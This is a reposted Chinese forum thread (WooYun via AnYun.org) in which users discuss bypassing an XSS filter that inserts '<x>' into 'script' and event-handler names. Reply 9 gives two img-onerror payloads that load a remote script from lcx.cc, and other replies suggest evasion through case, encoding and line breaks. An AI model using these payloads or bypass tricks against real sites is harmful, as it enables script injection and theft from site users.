安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x>

script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x>

时间:2014-08-11来源:WOOYUN 作者:醉入红尘梦点击:
script 变成script,还有javascript onload onmouseover 基本都是加入捣蛋的

script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x> 
我在想,之前ewebeditor,style样式添加,asaspp来拿shell。那么这个<x>,可不可以也这样绕过呢。对了String.fromCharCode(47,120,115,115,46,114,101,47,54,5)里的数字会自动去掉,变成String.fromCharCode(471201151154611410147545)。URI编码也照样解析后加入<x>.  //本文来自安云网

总之我这几个小时一直研究,被<x>弄疯了。各位大牛,能给下思路吗? //内容来自安云网

//安云网,anyun.org

1#醉入红尘梦 | 2013-12-15 02:10

//内容来自安云网

已经搞定

//内容来自AnYun.ORG

 

//本文来自安云网

2#blast | 2013-12-15 02:14

//安云网咨询系统

网易么。。记得网易有个手机站就是这么风骚。。

//安云网,anyun.org

 

//本文来自安云网

3#核攻击 | 2013-12-15 09:51

//安云网咨询系统

大小写、编码、回车换行字符 //安云网,anyun.org

 

//ANYUN.ORG

4#H.Shao | 2013-12-15 14:34

//copyright AnYun.ORG

@醉入红尘梦 求搞定方法。技术交流 //内容来自安云网

  //内容来自AnYun.ORG

5#1ee | 2013-12-15 16:39 //安云网咨询系统

@醉入红尘梦 同求搞定方法 //安云网,anyun.org

  //copyright AnYun.ORG

6#醉入红尘梦 | 2013-12-15 21:50

//copyright AnYun.ORG

@核攻击 核总威武。顺便问下怎么加载js //本文来自安云网

 

//copyright AnYun.ORG

7#D&G | 2013-12-16 09:24 //本文来自安云网

@醉入红尘梦 搞定了不分享么 //内容来自AnYun.ORG

 

//内容来自安云网

8#Oops | 2013-12-16 10:55

//内容来自安云网

2013-12-15 00:47---------->>2013-12-15 02:10

//内容来自安云网

LZ搞了83分钟搞好了,为什么不分享!

//内容来自安云网

自娱自乐啊,自问自答啊! //copyright AnYun.ORG

  //安云网,anyun.org

9#核攻击 | 2013-12-16 10:59 //安云网咨询系统

@醉入红尘梦 

//ANYUN.ORG


//安云网,anyun.org

<img src=# onerror=javascript:document.write('<scr'+'ipt src=\'http://lcx.cc/1.js\'></scr'+'ipt>')></img>

//内容来自安云网

<img src=# onerror=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img>

//安云网咨询系统

 

//ANYUN.ORG

10#醉入红尘梦 | 2013-12-16 20:41 //安云网,anyun.org

@Oops @1ee @H.Shao @D&G @核攻击 就是核总这个代码。但是核总,字符限制到60个。而且onerror也添加?<x>,发现+都过滤。。

//内容来自AnYun.ORG

 

//安云网咨询系统

11#猫头鹰 | 2013-12-17 08:41 //本文来自安云网

我是不会告诉你我也遇到这个问题的~妈的恶心死了 //安云网,anyun.org

  //copyright AnYun.ORG

12#Manning | 2013-12-20 14:47

//本文来自安云网

前端限制字符,不一定服务器端限制字符数目啊 //内容来自AnYun.ORG

  //安云网咨询系统

13#猫头鹰 | 2014-03-24 18:14 //ANYUN.ORG

楼主你得绕过在哪里 //内容来自AnYun.ORG

  //安云网,anyun.org

14#Airbasic | 2014-03-25 11:03 //安云网,anyun.org

楼主求细节啊 //copyright AnYun.ORG

 

//copyright AnYun.ORG

15#我来找快乐 | 2014-03-25 11:52

//ANYUN.ORG

LZ不厚道,自己过了就不发细节 //ANYUN.ORG



//安云网,anyun.org

顶一下
(0)
0%
踩一下
(1)
100%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容